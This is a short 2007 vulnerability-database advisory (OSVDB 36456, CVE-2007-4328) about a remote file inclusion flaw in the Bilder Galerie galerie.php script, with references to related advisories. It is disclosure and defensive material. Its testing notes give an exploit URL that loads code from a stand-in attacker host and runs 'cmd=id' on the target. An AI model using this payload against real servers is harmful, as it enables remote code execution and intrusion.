Bilder Galerie galerie.php config[root_ordner] Variable Remote File Inclusion

2007-08-09T00:00:00
ID OSVDB:36456
Type osvdb
Reporter Rizgar(rizgar@linuxmail.org)
Modified 2007-08-09T00:00:00

Description

Manual Testing Notes

http://[target]/galerie.php?config[root_ordner]=http://[attacker]?cmd=id

References:

Secunia Advisory ID:26400 Related OSVDB ID: 36455 Related OSVDB ID: 36457 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-08/0112.html ISS X-Force ID: 35923 FrSIRT Advisory: ADV-2007-2838 CVE-2007-4328 Bugtraq ID: 25256